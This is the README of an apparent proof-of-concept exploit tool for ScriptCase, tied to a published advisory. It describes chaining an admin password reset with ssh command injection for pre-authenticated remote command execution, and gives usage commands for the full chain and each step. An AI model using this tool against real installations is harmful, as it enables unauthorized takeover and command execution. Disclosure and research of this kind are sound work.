# ScriptCase - Pre-Authenticated Remote Command Execution

## Chaining administrator's password reset (authentication bypass, CVE-2025-47227) and shell injection (authenticated remote command execution, CVE-2025-47228)

Pre-authenticated remote command execution is achieved by chaining two vulnerabilities: the first is the ability to reset the administrator password of the prod console under certain conditions, and the second is a simple authenticated remote command execution in the connection features where user input is directly concatenated to a ssh system command.

## Requirements

The third-party Python dependencies used by the exploits can be installed with one of the following commands:

```bash
# pip - universal
pip3 install Pillow pytesseract requests beautifulsoup4

# pacman - Arch Linux
pacman -S python-pillow python-pytesseract python-requests python-beautifulsoup4
```

## Usage

An exploitation script was written to handle several scenarios:

- Perform the pre-authentication remote command execution by chaining the two vulnerabilities (password reset and authenticated command execution)
- Only perform the password reset
- Only perform authenticated command execution
- Detect the deployment path

```
Usage:
  Examples:

  Pre-Auth RCE (password reset + RCE)
    python exploit.py -u http://example.org/scriptcase -c "command"
  Password reset only (no auth)
    python exploit.py -u http://example.org/scriptcase
  RCE only (need account)
    python exploit.py -u http://example.org/scriptcase -c "command" -p 'Password123*'
  Detect deployment path
    python exploit.py -u http://example.org/ -d


Options:
  -h, --help            show this help message and exit
  -u BASE_URL, --base-url=BASE_URL
  -c COMMAND, --command=COMMAND
  -p PASSWORD, --password=PASSWORD
  -d, --detect
```

## Affected versions

Version 1.0.003-build-2 of the Production Environment module is affected. This version of the module is included in ScriptCase version 9.12.006 (23). Anterior versions are likely to be vulnerable as well.

## References

https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution